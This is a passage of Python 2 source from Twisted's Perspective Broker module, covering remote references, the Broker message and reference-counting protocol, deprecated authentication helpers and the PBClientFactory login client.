return "unpersistable", "References cannot be serialized"
def unjellyFor(self, unjellier, unjellyList):
self.__init__(unjellier.invoker.unserializingPerspective, unjellier.invoker, unjellyList[1], 1)
return self
def callRemote(self, _name, *args, **kw):
"""Asynchronously invoke a remote method.
@type _name: C{string}
@param _name: the name of the remote method to invoke
@param args: arguments to serialize for the remote function
@param kw: keyword arguments to serialize for the remote function.
@rtype: L{twisted.internet.defer.Deferred}
@returns: a Deferred which will be fired when the result of
this remote call is received.
"""
# note that we use '_name' instead of 'name' so the user can call
# remote methods with 'name' as a keyword parameter, like this:
# ref.callRemote("getPeopleNamed", count=12, name="Bob")
return self.broker._sendMessage('',self.perspective, self.luid,
_name, args, kw)
def remoteMethod(self, key):
"""Get a L{RemoteMethod} for this key.
"""
return RemoteMethod(self, key)
def __cmp__(self,other):
"""Compare me [to another L{RemoteReference}].
"""
if isinstance(other, RemoteReference):
if other.broker == self.broker:
return cmp(self.luid, other.luid)
return cmp(self.broker, other)
def __hash__(self):
"""Hash me.
"""
return self.luid
def __del__(self):
"""Do distributed reference counting on finalization.
"""
if self.doRefCount:
self.broker.sendDecRef(self.luid)
setUnjellyableForClass("remote", RemoteReference)
components.backwardsCompatImplements(RemoteReference)
class Local:
"""(internal) A reference to a local object.
"""
def __init__(self, object, perspective=None):
"""Initialize.
"""
self.object = object
self.perspective = perspective
self.refcount = 1
def __repr__(self):
return "<pb.Local %r ref:%s>" % (self.object, self.refcount)
def incref(self):
"""Increment and return my reference count.
"""
self.refcount = self.refcount + 1
return self.refcount
def decref(self):
"""Decrement and return my reference count.
"""
self.refcount = self.refcount - 1
return self.refcount
class _RemoteCacheDummy:
"""Ignore.
"""
##
# Failure
##
class CopyableFailure(failure.Failure, Copyable):
"""
A L{flavors.RemoteCopy} and L{flavors.Copyable} version of
L{twisted.python.failure.Failure} for serialization.
"""
unsafeTracebacks = 0
def getStateToCopy(self):
#state = self.__getstate__()
state = self.__dict__.copy()
state['tb'] = None
state['frames'] = []
state['stack'] = []
if isinstance(self.value, failure.Failure):
state['value'] = failure2Copyable(self.value, self.unsafeTracebacks)
else:
state['value'] = str(self.value) # Exception instance
state['type'] = str(self.type) # Exception class
if self.unsafeTracebacks:
io = StringIO.StringIO()
self.printTraceback(io)
state['traceback'] = io.getvalue()
else:
state['traceback'] = 'Traceback unavailable\n'
return state
class CopiedFailure(RemoteCopy, failure.Failure):
def printTraceback(self, file=None, elideFrameworkCode=0, detail='default'):
if file is None:
file = log.logfile
file.write("Traceback from remote host -- ")
file.write(self.traceback)
printBriefTraceback = printTraceback
printDetailedTraceback = printTraceback
setUnjellyableForClass(CopyableFailure, CopiedFailure)
def failure2Copyable(fail, unsafeTracebacks=0):
f = CopyableFailure()
f.__dict__ = fail.__dict__
f.unsafeTracebacks = unsafeTracebacks
return f
class Broker(banana.Banana):
"""I am a broker for objects.
"""
version = 6
username = None
factory = None
def __init__(self, isClient=1, security=globalSecurity):
banana.Banana.__init__(self, isClient)
self.disconnected = 0
self.disconnects = []
self.failures = []
self.connects = []
self.localObjects = {}
self.security = security
self.pageProducers = []
self.currentRequestID = 0
self.currentLocalID = 0
# Some terms:
# PUID: process unique ID; return value of id() function. type "int".
# LUID: locally unique ID; an ID unique to an object mapped over this
# connection. type "int"
# GUID: (not used yet) globally unique ID; an ID for an object which
# may be on a redirected or meta server. Type as yet undecided.
# Dictionary mapping LUIDs to local objects.
# set above to allow root object to be assigned before connection is made
# self.localObjects = {}
# Dictionary mapping PUIDs to LUIDs.
self.luids = {}
# Dictionary mapping LUIDs to local (remotely cached) objects. Remotely
# cached means that they're objects which originate here, and were
# copied remotely.
self.remotelyCachedObjects = {}
# Dictionary mapping PUIDs to (cached) LUIDs
self.remotelyCachedLUIDs = {}
# Dictionary mapping (remote) LUIDs to (locally cached) objects.
self.locallyCachedObjects = {}
self.waitingForAnswers = {}
def resumeProducing(self):
"""Called when the consumer attached to me runs out of buffer.
"""
# Go backwards over the list so we can remove indexes from it as we go
for pageridx in xrange(len(self.pageProducers)-1, -1, -1):
pager = self.pageProducers[pageridx]
pager.sendNextPage()
if not pager.stillPaging():
del self.pageProducers[pageridx]
if not self.pageProducers:
self.transport.unregisterProducer()
# Streaming producer methods; not necessary to implement.
def pauseProducing(self):
pass
def stopProducing(self):
pass
def registerPageProducer(self, pager):
self.pageProducers.append(pager)
if len(self.pageProducers) == 1:
self.transport.registerProducer(self, 0)
def expressionReceived(self, sexp):
"""Evaluate an expression as it's received.
"""
if isinstance(sexp, types.ListType):
command = sexp[0]
methodName = "proto_%s" % command
method = getattr(self, methodName, None)
if method:
method(*sexp[1:])
else:
self.sendCall("didNotUnderstand", command)
else:
raise ProtocolError("Non-list expression received.")
def proto_version(self, vnum):
"""Protocol message: (version version-number)
Check to make sure that both ends of the protocol are speaking
the same version dialect.
"""
if vnum != self.version:
raise ProtocolError("Version Incompatibility: %s %s" % (self.version, vnum))
def sendCall(self, *exp):
"""Utility method to send an expression to the other side of the connection.
"""
self.sendEncoded(exp)
def proto_didNotUnderstand(self, command):
"""Respond to stock 'C{didNotUnderstand}' message.
Log the command that was not understood and continue. (Note:
this will probably be changed to close the connection or raise
an exception in the future.)
"""
log.msg("Didn't understand command: %r" % command)
def connectionReady(self):
"""Initialize. Called after Banana negotiation is done.
"""
self.sendCall("version", self.version)
for notifier in self.connects:
try:
notifier()
except:
log.deferr()
self.connects = None
if self.factory: # in tests we won't have factory
self.factory.clientConnectionMade(self)
def connectionFailed(self):
# XXX should never get called anymore? check!
for notifier in self.failures:
try:
notifier()
except:
log.deferr()
self.failures = None
waitingForAnswers = None
def connectionLost(self, reason):
"""The connection was lost.
"""
self.disconnected = 1
# nuke potential circular references.
self.luids = None
if self.waitingForAnswers:
for d in self.waitingForAnswers.values():
try:
d.errback(failure.Failure(PBConnectionLost(reason)))
except:
log.deferr()
# Assure all Cacheable.stoppedObserving are called
for lobj in self.remotelyCachedObjects.values():
cacheable = lobj.object
perspective = lobj.perspective
try:
cacheable.stoppedObserving(perspective, RemoteCacheObserver(self, cacheable, perspective))
except:
log.deferr()
# Loop on a copy to prevent notifiers to mixup
# the list by calling dontNotifyOnDisconnect
for notifier in self.disconnects[:]:
try:
notifier()
except:
log.deferr()
self.disconnects = None
self.waitingForAnswers = None
self.localSecurity = None
self.remoteSecurity = None
self.remotelyCachedObjects = None
self.remotelyCachedLUIDs = None
self.locallyCachedObjects = None
self.localObjects = None
def notifyOnDisconnect(self, notifier):
"""Call the given callback when the Broker disconnects."""
assert callable(notifier)
self.disconnects.append(notifier)
def notifyOnFail(self, notifier):
"""Call the given callback if the Broker fails to connect."""
assert callable(notifier)
self.failures.append(notifier)
def notifyOnConnect(self, notifier):
"""Call the given callback when the Broker connects."""
assert callable(notifier)
if self.connects is None:
try:
notifier()
except:
log.err()
else:
self.connects.append(notifier)
def dontNotifyOnDisconnect(self, notifier):
"""Remove a callback from list of disconnect callbacks."""
try:
self.disconnects.remove(notifier)
except ValueError:
pass
def localObjectForID(self, luid):
"""Get a local object for a locally unique ID.
I will return an object previously stored with
        self.L{registerReference}, or C{None} if no object is registered under that ID.
"""
lob = self.localObjects.get(luid)
if lob is None:
return
return lob.object
maxBrokerRefsViolations = 0
def registerReference(self, object):
"""Get an ID for a local object.
Store a persistent reference to a local object and map its id()
to a generated, session-unique ID and return that ID.
"""
assert object is not None
puid = object.processUniqueID()
luid = self.luids.get(puid)
if luid is None:
if len(self.localObjects) > MAX_BROKER_REFS:
self.maxBrokerRefsViolations = self.maxBrokerRefsViolations + 1
if self.maxBrokerRefsViolations > 3:
self.transport.loseConnection()
raise Error("Maximum PB reference count exceeded. "
"Goodbye.")
raise Error("Maximum PB reference count exceeded.")
luid = self.newLocalID()
self.localObjects[luid] = Local(object)
self.luids[puid] = luid
else:
self.localObjects[luid].incref()
return luid
def setNameForLocal(self, name, object):
"""Store a special (string) ID for this object.
This is how you specify a 'base' set of objects that the remote
protocol can connect to.
"""
assert object is not None
self.localObjects[name] = Local(object)
def remoteForName(self, name):
"""Returns an object from the remote name mapping.
Note that this does not check the validity of the name, only
creates a translucent reference for it.
"""
return RemoteReference(None, self, name, 0)
def cachedRemotelyAs(self, instance, incref=0):
"""Returns an ID that says what this instance is cached as remotely, or C{None} if it's not.
"""
puid = instance.processUniqueID()
luid = self.remotelyCachedLUIDs.get(puid)
if (luid is not None) and (incref):
self.remotelyCachedObjects[luid].incref()
return luid
def remotelyCachedForLUID(self, luid):
"""Returns an instance which is cached remotely, with this LUID.
"""
return self.remotelyCachedObjects[luid].object
def cacheRemotely(self, instance):
"""
XXX"""
puid = instance.processUniqueID()
luid = self.newLocalID()
if len(self.remotelyCachedObjects) > MAX_BROKER_REFS:
self.maxBrokerRefsViolations = self.maxBrokerRefsViolations + 1
if self.maxBrokerRefsViolations > 3:
self.transport.loseConnection()
raise Error("Maximum PB cache count exceeded. "
"Goodbye.")
raise Error("Maximum PB cache count exceeded.")
self.remotelyCachedLUIDs[puid] = luid
# This table may not be necessary -- for now, it's to make sure that no
# monkey business happens with id(instance)
self.remotelyCachedObjects[luid] = Local(instance, self.serializingPerspective)
return luid
def cacheLocally(self, cid, instance):
"""(internal)
Store a non-filled-out cached instance locally.
"""
self.locallyCachedObjects[cid] = instance
def cachedLocallyAs(self, cid):
instance = self.locallyCachedObjects[cid]
return instance
def serialize(self, object, perspective=None, method=None, args=None, kw=None):
"""Jelly an object according to the remote security rules for this broker.
"""
if isinstance(object, defer.Deferred):
object.addCallbacks(self.serialize, lambda x: x,
callbackKeywords={
'perspective': perspective,
'method': method,
'args': args,
'kw': kw
})
return object
# XXX This call is NOT REENTRANT and testing for reentrancy is just
# crazy, so it likely won't be. Don't ever write methods that call the
# broker's serialize() method recursively (e.g. sending a method call
# from within a getState (this causes concurrency problems anyway so
# you really, really shouldn't do it))
# self.jellier = _NetJellier(self)
self.serializingPerspective = perspective
self.jellyMethod = method
self.jellyArgs = args
self.jellyKw = kw
try:
return jelly(object, self.security, None, self)
finally:
self.serializingPerspective = None
self.jellyMethod = None
self.jellyArgs = None
self.jellyKw = None
def unserialize(self, sexp, perspective = None):
"""Unjelly an sexp according to the local security rules for this broker.
"""
self.unserializingPerspective = perspective
try:
return unjelly(sexp, self.security, None, self)
finally:
self.unserializingPerspective = None
def newLocalID(self):
"""Generate a new LUID.
"""
self.currentLocalID = self.currentLocalID + 1
return self.currentLocalID
def newRequestID(self):
"""Generate a new request ID.
"""
self.currentRequestID = self.currentRequestID + 1
return self.currentRequestID
def _sendMessage(self, prefix, perspective, objectID, message, args, kw):
pbc = None
pbe = None
answerRequired = 1
if kw.has_key('pbcallback'):
pbc = kw['pbcallback']
del kw['pbcallback']
if kw.has_key('pberrback'):
pbe = kw['pberrback']
del kw['pberrback']
if kw.has_key('pbanswer'):
assert (not pbe) and (not pbc), "You can't specify a no-answer requirement."
answerRequired = kw['pbanswer']
del kw['pbanswer']
if self.disconnected:
raise DeadReferenceError("Calling Stale Broker")
try:
netArgs = self.serialize(args, perspective=perspective, method=message)
netKw = self.serialize(kw, perspective=perspective, method=message)
except:
return defer.fail(failure.Failure())
requestID = self.newRequestID()
if answerRequired:
rval = defer.Deferred()
self.waitingForAnswers[requestID] = rval
if pbc or pbe:
log.msg('warning! using deprecated "pbcallback"')
rval.addCallbacks(pbc, pbe)
else:
rval = None
self.sendCall(prefix+"message", requestID, objectID, message, answerRequired, netArgs, netKw)
return rval
def proto_message(self, requestID, objectID, message, answerRequired, netArgs, netKw):
self._recvMessage(self.localObjectForID, requestID, objectID, message, answerRequired, netArgs, netKw)
def proto_cachemessage(self, requestID, objectID, message, answerRequired, netArgs, netKw):
self._recvMessage(self.cachedLocallyAs, requestID, objectID, message, answerRequired, netArgs, netKw)
def _recvMessage(self, findObjMethod, requestID, objectID, message, answerRequired, netArgs, netKw):
"""Received a message-send.
Look up message based on object, unserialize the arguments, and
invoke it with args, and send an 'answer' or 'error' response.
"""
try:
object = findObjMethod(objectID)
if object is None:
raise Error("Invalid Object ID")
netResult = object.remoteMessageReceived(self, message, netArgs, netKw)
except Error, e:
if answerRequired:
# If the error is Jellyable or explicitly allowed via our
# security options, send it back and let the code on the
# other end deal with unjellying. If it isn't Jellyable,
# wrap it in a CopyableFailure, which ensures it can be
# unjellied on the other end. We have to do this because
# all errors must be sent back.
if isinstance(e, Jellyable) or self.security.isClassAllowed(e.__class__):
self._sendError(e, requestID)
else:
self._sendError(CopyableFailure(e), requestID)
except:
if answerRequired:
log.msg("Peer will receive following PB traceback:", isError=True)
f = CopyableFailure()
self._sendError(f, requestID)
log.deferr()
else:
if answerRequired:
if isinstance(netResult, defer.Deferred):
args = (requestID,)
netResult.addCallbacks(self._sendAnswer, self._sendFailure,
callbackArgs=args, errbackArgs=args)
# XXX Should this be done somewhere else?
else:
self._sendAnswer(netResult, requestID)
##
# success
##
def _sendAnswer(self, netResult, requestID):
"""(internal) Send an answer to a previously sent message.
"""
self.sendCall("answer", requestID, netResult)
def proto_answer(self, requestID, netResult):
"""(internal) Got an answer to a previously sent message.
Look up the appropriate callback and call it.
"""
d = self.waitingForAnswers[requestID]
del self.waitingForAnswers[requestID]
d.callback(self.unserialize(netResult))
##
# failure
##
def _sendFailure(self, fail, requestID):
"""Log error and then send it."""
log.msg("Peer will receive following PB traceback:")
log.err(fail)
self._sendError(fail, requestID)
def _sendError(self, fail, requestID):
"""(internal) Send an error for a previously sent message.
"""
if isinstance(fail, failure.Failure):
# If the failures value is jellyable or allowed through security,
# send the value
if (isinstance(fail.value, Jellyable) or
self.security.isClassAllowed(fail.value.__class__)):
fail = fail.value
elif not isinstance(fail, CopyableFailure):
fail = failure2Copyable(fail, self.factory.unsafeTracebacks)
if isinstance(fail, CopyableFailure):
fail.unsafeTracebacks = self.factory.unsafeTracebacks
self.sendCall("error", requestID, self.serialize(fail))
def proto_error(self, requestID, fail):
"""(internal) Deal with an error.
"""
d = self.waitingForAnswers[requestID]
del self.waitingForAnswers[requestID]
d.errback(self.unserialize(fail))
##
# refcounts
##
def sendDecRef(self, objectID):
"""(internal) Send a DECREF directive.
"""
self.sendCall("decref", objectID)
def proto_decref(self, objectID):
"""(internal) Decrement the reference count of an object.
If the reference count is zero, it will free the reference to this
object.
"""
refs = self.localObjects[objectID].decref()
if refs == 0:
puid = self.localObjects[objectID].object.processUniqueID()
del self.luids[puid]
del self.localObjects[objectID]
##
# caching
##
def decCacheRef(self, objectID):
"""(internal) Send a DECACHE directive.
"""
self.sendCall("decache", objectID)
def proto_decache(self, objectID):
"""(internal) Decrement the reference count of a cached object.
If the reference count is zero, free the reference, then send an
'uncached' directive.
"""
refs = self.remotelyCachedObjects[objectID].decref()
# log.msg('decaching: %s #refs: %s' % (objectID, refs))
if refs == 0:
lobj = self.remotelyCachedObjects[objectID]
cacheable = lobj.object
perspective = lobj.perspective
# TODO: force_decache needs to be able to force-invalidate a
# cacheable reference.
try:
cacheable.stoppedObserving(perspective, RemoteCacheObserver(self, cacheable, perspective))
except:
log.deferr()
puid = cacheable.processUniqueID()
del self.remotelyCachedLUIDs[puid]
del self.remotelyCachedObjects[objectID]
self.sendCall("uncache", objectID)
def proto_uncache(self, objectID):
"""(internal) Tell the client it is now OK to uncache an object.
"""
# log.msg("uncaching locally %d" % objectID)
obj = self.locallyCachedObjects[objectID]
obj.broker = None
## def reallyDel(obj=obj):
## obj.__really_del__()
## obj.__del__ = reallyDel
del self.locallyCachedObjects[objectID]
class BrokerFactory(protocol.Factory, styles.Versioned):
"""DEPRECATED, use PBServerFactory instead.
I am a server for object brokerage.
"""
unsafeTracebacks = 0
persistenceVersion = 3
def __init__(self, objectToBroker):
warnings.warn("This is deprecated. Use PBServerFactory.", DeprecationWarning, 2)
self.objectToBroker = objectToBroker
def config_objectToBroker(self, newObject):
self.objectToBroker = newObject
def upgradeToVersion2(self):
app = self.app
del self.app
self.__init__(AuthRoot(app))
def buildProtocol(self, addr):
"""Return a Broker attached to me (as the service provider).
"""
proto = Broker(0)
proto.factory = self
proto.setNameForLocal("root",
self.objectToBroker.rootObject(proto))
return proto
def clientConnectionMade(self, protocol):
pass
### DEPRECATED AUTH STUFF
class AuthRoot(Root):
"""DEPRECATED.
I provide AuthServs as root objects to Brokers for a BrokerFactory.
"""
def __init__(self, auth):
from twisted.internet.app import Application
if isinstance(auth, Application):
auth = auth.authorizer
self.auth = auth
def rootObject(self, broker):
return AuthServ(self.auth, broker)
class _Detacher:
"""DEPRECATED."""
def __init__(self, perspective, remoteRef, identity, broker):
self.perspective = perspective
self.remoteRef = remoteRef
self.identity = identity
self.broker = broker
def detach(self):
self.perspective.brokerDetached(self.remoteRef,
self.identity,
self.broker)
class IdentityWrapper(Referenceable):
"""DEPRECATED.
I delegate most functionality to a L{twisted.cred.identity.Identity}.
"""
def __init__(self, broker, identity):
"""Initialize, specifying an identity to wrap.
"""
self.identity = identity
self.broker = broker
def remote_attach(self, serviceName, perspectiveName, remoteRef):
"""Attach the remote reference to a requested perspective.
"""
return self.identity.requestPerspectiveForKey(
serviceName, perspectiveName).addCallbacks(
self._attached, lambda x: x,
callbackArgs = [remoteRef])
def _attached(self, perspective, remoteRef):
perspective = perspective.brokerAttached(remoteRef,
self.identity,
self.broker)
# Make sure that when connectionLost happens, this perspective
# will be tracked in order that 'detached' will be called.
self.broker.notifyOnDisconnect(_Detacher(perspective,
remoteRef,
self.identity,
self.broker).detach)
return AsReferenceable(perspective, "perspective")
# (Possibly?) TODO: Implement 'remote_detach' as well.
class AuthChallenger(Referenceable):
"""DEPRECATED.
See also: AuthServ
"""
def __init__(self, ident, serv, challenge):
self.ident = ident
self.challenge = challenge
self.serv = serv
def remote_respond(self, response):
if self.ident:
d = defer.Deferred()
pwrq = self.ident.verifyPassword(self.challenge, response)
pwrq.addCallback(self._authOk, d)
pwrq.addErrback(self._authFail, d)
return d
def _authOk(self, result, d):
d.callback(IdentityWrapper(self.serv.broker, self.ident))
def _authFail(self, result, d):
d.callback(None)
class AuthServ(Referenceable):
"""DEPRECATED.
See also: L{AuthRoot}
"""
def __init__(self, auth, broker):
self.auth = auth
self.broker = broker
def remote_username(self, username):
defr = self.auth.getIdentityRequest(username)
defr.addCallback(self.mkchallenge)
return defr
def mkchallenge(self, ident):
if type(ident) == types.StringType:
# it's an error, so we must fail.
challenge = identity.challenge()
return challenge, AuthChallenger(None, self, challenge)
else:
challenge = ident.challenge()
return challenge, AuthChallenger(ident, self, challenge)
class _ObjectRetrieval:
"""DEPRECATED.
(Internal) Does callbacks for L{getObjectAt}.
"""
def __init__(self, broker, d):
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
self.deferred = d
self.term = 0
self.broker = broker
# XXX REFACTOR: this seems weird.
# I'm not inheriting because I have to delegate at least 2 of these
# things anyway.
broker.notifyOnFail(self.connectionFailed)
broker.notifyOnConnect(self.connectionMade)
broker.notifyOnDisconnect(self.connectionLost)
def connectionLost(self):
if not self.term:
self.term = 1
del self.broker
self.deferred.errback(error.ConnectionLost())
del self.deferred
def connectionMade(self):
assert not self.term, "How did this get called?"
x = self.broker.remoteForName("root")
del self.broker
self.term = 1
self.deferred.callback(x)
del self.deferred
def connectionFailed(self):
if not self.term:
self.term = 1
del self.broker
self.deferred.errback(error.ConnectError(string="Connection failed"))
del self.deferred
class BrokerClientFactory(protocol.ClientFactory):
noisy = 0
unsafeTracebacks = 0
def __init__(self, protocol):
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
if not isinstance(protocol,Broker): raise TypeError, "protocol is not an instance of Broker"
self.protocol = protocol
def buildProtocol(self, addr):
return self.protocol
def clientConnectionFailed(self, connector, reason):
self.protocol.connectionFailed()
def clientConnectionMade(self, protocol):
pass
def getObjectRetriever():
"""DEPRECATED.
    Get a client factory which retrieves a remote root object.
    @returns: A pair: A ClientFactory and a Deferred which will be passed a
        remote reference to the root object of a PB server.
"""
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
d = defer.Deferred()
b = Broker(1)
bf = BrokerClientFactory(b)
_ObjectRetrieval(b, d)
return bf, d
def getObjectAt(host, port, timeout=None):
"""DEPRECATED. Establishes a PB connection and returns with a L{RemoteReference}.
@param host: the host to connect to
@param port: the port number to connect to
    @param timeout: the number of seconds to wait before failing by
        default. (OPTIONAL)
    @returns: A Deferred which will be passed a remote reference to the
        root object of a PB server.
"""
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
bf = PBClientFactory()
if host == "unix":
# every time you use this, God kills a kitten
reactor.connectUNIX(port, bf, timeout)
else:
reactor.connectTCP(host, port, bf, timeout)
return bf.getRootObject()
def getObjectAtSSL(host, port, timeout=None, contextFactory=None):
"""DEPRECATED. Establishes a PB connection over SSL and returns with a RemoteReference.
@param host: the host to connect to
@param port: the port number to connect to
    @param timeout: the number of seconds to wait before failing by
        default. (OPTIONAL)
@param contextFactory: A factory object for producing SSL.Context
objects. (OPTIONAL)
@returns: A Deferred which will be passed a remote reference to the
root object of a PB server.
"""
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
bf = PBClientFactory()
if contextFactory is None:
from twisted.internet import ssl
contextFactory = ssl.ClientContextFactory()
reactor.connectSSL(host, port, bf, contextFactory, timeout)
return bf.getRootObject()
def connect(host, port, username, password, serviceName,
perspectiveName=None, client=None, timeout=None):
"""DEPRECATED. Connects and authenticates, then retrieves a PB service.
Required arguments:
- host -- the host the service is running on
- port -- the port on the host to connect to
- username -- the name you will be identified as to the authorizer
- password -- the password for this username
- serviceName -- name of the service to request
Optional (keyword) arguments:
- perspectiveName -- the name of the perspective to request, if
different than the username
- client -- XXX the \"reference\" argument to
perspective.Perspective.attached
- timeout -- see twisted.internet.tcp.Client
@returns: A Deferred instance that gets a callback when the final
Perspective is connected, and an errback when an error
occurs at any stage of connecting.
"""
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
if timeout == None:
timeout = 30
bf = PBClientFactory()
if host == "unix":
# every time you use this, God kills a kitten
reactor.connectUNIX(port, bf, timeout)
else:
reactor.connectTCP(host, port, bf, timeout)
return bf.getPerspective(username, password, serviceName, perspectiveName, client)
def _connGotRoot(root, d, client, serviceName,
username, password, perspectiveName):
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
logIn(root, client, serviceName, username, password, perspectiveName).chainDeferred(d)
def authIdentity(authServRef, username, password):
"""DEPRECATED. Return a Deferred which will do the challenge-response dance and
return a remote Identity reference.
"""
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
d = defer.Deferred()
authServRef.callRemote('username', username).addCallbacks(
_cbRespondToChallenge, d.errback,
callbackArgs=(password,d))
return d
def _cbRespondToChallenge((challenge, challenger), password, d):
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
challenger.callRemote("respond", identity.respond(challenge, password)).addCallbacks(
d.callback, d.errback)
def logIn(authServRef, client, service, username, password, perspectiveName=None):
"""DEPRECATED. I return a Deferred which will be called back with a Perspective.
"""
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
d = defer.Deferred()
authServRef.callRemote('username', username).addCallbacks(
_cbLogInRespond, d.errback,
callbackArgs=(d, client, service, password,
perspectiveName or username))
return d
def _cbLogInRespond((challenge, challenger), d, client, service, password, perspectiveName):
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
challenger.callRemote('respond',
identity.respond(challenge, password)).addCallbacks(
_cbLogInResponded, d.errback,
callbackArgs=(d, client, service, perspectiveName))
def _cbLogInResponded(identity, d, client, serviceName, perspectiveName):
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
if identity:
identity.callRemote("attach", serviceName, perspectiveName, client).chainDeferred(d)
else:
from twisted import cred
d.errback(cred.error.Unauthorized("invalid username or password"))
class IdentityConnector:
"""DEPRECATED.
I support connecting to multiple Perspective Broker services that are
in a service tree.
"""
def __init__(self, host, port, identityName, password):
"""
@type host: C{string}
@param host: The host to connect to or the PB server.
If this is C{"unix"}, then a UNIX socket
will be used rather than a TCP socket.
@type port: C{integer}
@param port: The port to connect to for the PB server.
@type identityName: C{string}
@param identityName: The name of the identity to use to
                             authenticate with the PB server.
@type password: C{string}
        @param password: The password to use to authenticate with
the PB server.
"""
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
self.host = host
self.port = port
self.identityName = identityName
self.password = password
self._identityWrapper = None
self._connectDeferreds = []
self._requested = 0
def _cbGotAuthRoot(self, authroot):
authIdentity(authroot, self.identityName,
self.password).addCallbacks(
self._cbGotIdentity, self._ebGotIdentity)
def _cbGotIdentity(self, i):
self._identityWrapper = i
if i:
for d in self._connectDeferreds:
d.callback(i)
self._connectDeferreds[:] = []
else:
from twisted import cred
e = cred.error.Unauthorized("invalid username or password")
self._ebGotIdentity(e)
def _ebGotIdentity(self, e):
self._requested = 0
for d in self._connectDeferreds:
d.errback(e)
self._connectDeferreds[:] = []
def requestLogin(self):
"""
        Attempt to authenticate with the PB server, but don't
        request any services yet.
@returns: L{IdentityWrapper}
@rtype: L{twisted.internet.defer.Deferred}
"""
if not self._identityWrapper:
d = defer.Deferred()
self._connectDeferreds.append(d)
if not self._requested:
self._requested = 1
getObjectAt(self.host, self.port).addCallbacks(
self._cbGotAuthRoot, self._ebGotIdentity)
return d
else:
return defer.succeed(self._identityWrapper)
def requestService(self, serviceName, perspectiveName=None,
client=None):
"""
Request a perspective on the specified service. This will
authenticate against the server as well if L{requestLogin}
hasn't already been called.
@type serviceName: C{string}
@param serviceName: The name of the service to obtain
a perspective for.
@type perspectiveName: C{string}
@param perspectiveName: If specified, the name of the
perspective to obtain. Otherwise,
default to the name of the identity.
@param client: The client object to attach to
the perspective.
@rtype: L{twisted.internet.defer.Deferred}
@return: A deferred which will receive a callback
with the perspective.
"""
return self.requestLogin().addCallback(
lambda i, self=self: i.callRemote("attach",
serviceName,
perspectiveName,
client))
def disconnect(self):
"""Lose my connection to the server.
Useful to free up resources if you've completed requestLogin but
then change your mind.
"""
if not self._identityWrapper:
return
else:
self._identityWrapper.broker.transport.loseConnection()
# this is the new shiny API you should be using:
import md5
import random
from twisted.cred.credentials import ICredentials, IUsernameHashedPassword
def respond(challenge, password):
"""Respond to a challenge.
This is useful for challenge/response authentication.
"""
m = md5.new()
m.update(password)
hashedPassword = m.digest()
m = md5.new()
m.update(hashedPassword)
m.update(challenge)
doubleHashedPassword = m.digest()
return doubleHashedPassword
def challenge():
"""I return some random data."""
crap = ''
for x in range(random.randrange(15,25)):
crap = crap + chr(random.randint(65,90))
crap = md5.new(crap).digest()
return crap
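# Editor's note (illustrative sketch; the password value is hypothetical):
# challenge() and respond() above work as a pair -- the server issues a random
# challenge, the client returns md5(md5(password) + challenge), and the server
# recomputes the same double hash from its stored md5(password), so the
# plaintext password never crosses the wire.
#
#     c = challenge()
#     assert respond(c, "secret") == md5.new(md5.new("secret").digest() + c).digest()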
class PBClientFactory(protocol.ClientFactory):
"""Client factory for PB brokers.
As with all client factories, use with reactor.connectTCP/SSL/etc..
getPerspective and getRootObject can be called either before or
after the connect.
"""
protocol = Broker
unsafeTracebacks = 0
def __init__(self):
self._reset()
def _reset(self):
self.rootObjectRequests = [] # list of deferred
self._broker = None
self._root = None
def _failAll(self, reason):
deferreds = self.rootObjectRequests
self._reset()
for d in deferreds:
d.errback(reason)
def clientConnectionFailed(self, connector, reason):
self._failAll(reason)
def clientConnectionLost(self, connector, reason, reconnecting=0):
"""Reconnecting subclasses should call with reconnecting=1."""
if reconnecting:
# any pending requests will go to next connection attempt
# so we don't fail them.
self._broker = None
self._root = None
else:
self._failAll(reason)
def clientConnectionMade(self, broker):
self._broker = broker
self._root = broker.remoteForName("root")
ds = self.rootObjectRequests
self.rootObjectRequests = []
for d in ds:
d.callback(self._root)
def getRootObject(self):
"""Get root object of remote PB server.
@return Deferred of the root object.
"""
if self._broker and not self._broker.disconnected:
return defer.succeed(self._root)
d = defer.Deferred()
self.rootObjectRequests.append(d)
return d
def getPerspective(self, username, password, serviceName,
perspectiveName=None, client=None):
"""Get perspective from remote PB server.
New systems should use login() instead.
@return Deferred of RemoteReference to the perspective.
"""
warnings.warn("Update your backend to use PBServerFactory, and then use login().",
DeprecationWarning, 2)
if perspectiveName == None:
perspectiveName = username
d = self.getRootObject()
d.addCallback(self._cbAuthIdentity, username, password)
d.addCallback(self._cbGetPerspective, serviceName, perspectiveName, client)
return d
def _cbAuthIdentity(self, authServRef, username, password):
return authServRef.callRemote('username', username).addCallback(
self._cbRespondToChallenge, password)
def _cbRespondToChallenge(self, (challenge, challenger), password):
return challenger.callRemote("respond", respond(challenge, password))
def _cbGetPerspective(self, identityWrapper, serviceName, perspectiveName, client):
return identityWrapper.callRemote(
"attach", serviceName, perspectiveName, client)
def disconnect(self):
"""If the factory is connected, close the connection.
Note that if you set up the factory to reconnect, you will need to
implement extra logic to prevent automatic reconnection after this
is called.
"""
if self._broker:
self._broker.transport.loseConnection()
def _cbSendUsername(self, root, username, password, client):
return root.callRemote("login", username).addCallback(
self._cbResponse, password, client)
def _cbResponse(self, (challenge, challenger), password, client):
return challenger.callRemote("respond", respond(challenge, password), client)
def login(self, credentials, client=None):
"""Login and get perspective from remote PB server.
Currently only credentials implementing IUsernamePassword are
supported.
@return Deferred of RemoteReference to the perspective.
"""
d = self.getRootObject()
d.addCallback(self._cbSendUsername, credentials.username, credentials.password, client)
return d
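# Editor's sketch (host and account details are hypothetical): logging in
# against a cred-based PB server with PBClientFactory.login(), as recommended
# in the docstrings above.
#
#     from twisted.cred import credentials
#
#     factory = PBClientFactory()
#     reactor.connectTCP("localhost", 8787, factory)
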